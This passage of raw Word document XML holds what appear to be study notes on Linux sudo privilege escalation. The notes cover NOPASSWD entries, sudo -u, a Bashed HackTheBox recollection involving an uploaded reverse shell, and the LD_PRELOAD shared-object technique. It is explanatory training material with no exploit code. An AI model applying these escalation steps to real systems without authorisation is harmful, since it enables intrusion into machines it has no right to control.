    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User james may run the following commands on knife: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(root) NOPASSWD: /usr/bin/knife</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see from here, we are allowed to run /usr/bin/knife as root, without any passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Below are the default entries but they are not very useful!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env_reset: Resets environment variables to a safe default when using sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mail_badpass: Sends an email to the administrator when a user enters an incorrect password for sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secure_path: Specifies the PATH environment variable used by sudo to locate executables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes you are allowed to run SUDO commands as another user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5081588" cy="1245966"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="462" name="image452.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image452.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId737"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5081588" cy="1245966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we are user ariana and we can run this command as Selena using Sudo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the section below, we learn how to do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are allowed to run any SUDO commands from another user, here's how to do that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u &lt;username&gt; &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what we did in the Bashed HTB. When we did sudo -l, we saw:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User www-data may run the following commands on bashed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(scriptmanager : scriptmanager) NOPASSWD: ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means that scriptmanager was the user so we ran:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u scriptmanager &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ideal command to run here is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which gets interactive bash shell as root, but here, shells are not persistent. So, we had to upload a reverse shell to the web server, trigger the reverse shell by accessing the uploads URL, and then get a connection. From there, we could get the user flag, so it had nothing to do with the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo -u scriptmanager </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stuff. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ddl2mzjyo2ve" w:id="306"/>
      <w:bookmarkEnd w:id="306"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD (environment variable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Sudo Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1000125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="468" name="image336.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image336.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId738"/>
                    <a:srcRect b="71074" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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22E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You see this stuff at the top of sudo -l that you always ignore? Well, it has a meaning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Programs run through sudo can inherit the environment variables from the user’s environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the /etc/sudoers config file, if the env_reset option is set, sudo will run programs in a new, minimal environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The env_keep option can be used to keep certain environment variables from the user’s environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="943"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The configured options are displayed when running sudo -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_Preload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When set, the shared object will be loaded before any others.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Limitations of LD_Preload attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD will not work if the real user ID is different from the effective user ID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo must be configured to preserve the LD_PRELOAD environment variable using the env_keep option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
